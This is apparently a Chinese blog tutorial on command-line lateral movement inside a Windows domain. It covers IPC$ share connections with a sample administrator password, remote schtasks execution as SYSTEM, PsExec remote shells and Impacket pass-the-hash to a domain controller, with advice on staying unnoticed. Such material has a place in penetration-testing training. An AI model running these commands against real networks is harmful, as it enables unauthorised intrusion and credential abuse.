美文网首页虫虫
内网渗透-命令行渗透

内网渗透-命令行渗透

作者: nohands_noob | 来源:发表于2019-12-21 22:58 被阅读0次

在内网渗透时,如果登录远程桌面,容易暴露自己,所以还是尽可能使用命令行操作比较好

建立ipc连接
net use \\[ip] /u:[域名][用户] [密码]

例:net use \\192.168.83.10 /u:TEST\Administrator Iamtest123
net use 查看建立的ipc连接
net use \\192.168.83.10 /de /y 删除ipc连接
net view \\192.168.83.10 查看共享了哪些磁盘
dir \\192.168.83.10\c$\ 查看c盘目录
copy xxxx \\192.168.83.2\c$\ 上传文件到c盘
copy \\192.168.83.2\c$\xxx c:\ 下载文件到c盘
利用schtasks计划任务执行命令(不需要先创立ipc连接)

创建计划任务

schtasks /create /tn 任务名 /U 域\域用户 /P 域用户密码 /tr 执行的命令或bat路径 /sc ONSTART /s 域机子IP /RU system

执行计划任务

schtasks /run /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码

删除计划任务

schtasks /F /delete /tn 任务名 /s 域机子IP /U 域\域用户 /P 域用户密码
PsExec

下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
https://github.com/Al1ex/smbexec/releases
首先需要创建ipc连接
执行命令PsExec.exe \\192.168.83.10 -s cmd.exe -accepteula,然后等待一段时间,弹回shell

hash传递

另外我上篇抓取密码的文章中提到可以抓取密码的hash,我们可以通过该工具实现NTLM hash的传递
下载地址:https://github.com/SecureAuthCorp/impacket
上面的psexec.exe是微软的,并没有hash传递的功能
将Impacket中examples目录下的psexec.py用pyinstaller编译一下(编译完后有概率会被杀掉),生成psexec.exe文件
上传到服务器,使用命令:psexec.exe -hashes :xxxxxxxxxxxxxx TEST/Administrator@192.168.83.10获得域控管理员的shell


退出还会清掉文件
不好的就是中文会乱码

Impacket套件参考文章:http://www.secwk.com/2019/10/13/10518/

相关文章

  • 内网渗透-命令行渗透

    在内网渗透时,如果登录远程桌面,容易暴露自己,所以还是尽可能使用命令行操作比较好 建立ipc连接net use \...

  • 内网渗透

    内网渗透

  • 当我讲起内网渗透,他们都弃我而去了

    前言在内网渗透的过程中思路才是最重要的,本次内网渗透的主机虽然不多,主要还是锻炼自己内网渗透的一个思想。 环境搭建...

  • 内网渗透_域渗透2

    先放地址:https://bithack.io/forum/267 自从第一眼看到这篇文章之后就顺手将环境保存了网...

  • 内网渗透_域渗透3

    本篇文章接续上一篇文章内网渗透_域渗透2进行进一步测试,环境链接见最下。 一、理清思路 首先要能够获取域内一台主机...

  • 内网渗透_域渗透4

    去年的案例,回顾补充下。 SQL Server数据库sa弱口令导致获取域控服务器控制权限 漏洞简报: 本机连接A地...

  • 内网渗透_域渗透1

    一直以来做的都是内外网的Web系统渗透测试,没有做过内网中的域渗透测试,正值护网期间,客户要求我扮演一名进入到内网...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • 基于MetaSploit内网穿透渗透测试

    自己在无聊捣鼓windows渗透的时候想到以往都是基于内网渗透,想要更加自由地进行渗透就需要内网穿透实现可以任意控...

  • 网络嗅探

    1、 (1)Why要内网渗透:安全机制严,正面突破难;内网间信任,攻击更容易。 (2)内网渗透技术:嗅探、假消息攻...

网友评论

    本文标题:内网渗透-命令行渗透

    本文链接:https://www.haomeiwen.com/subject/uhwinctx.html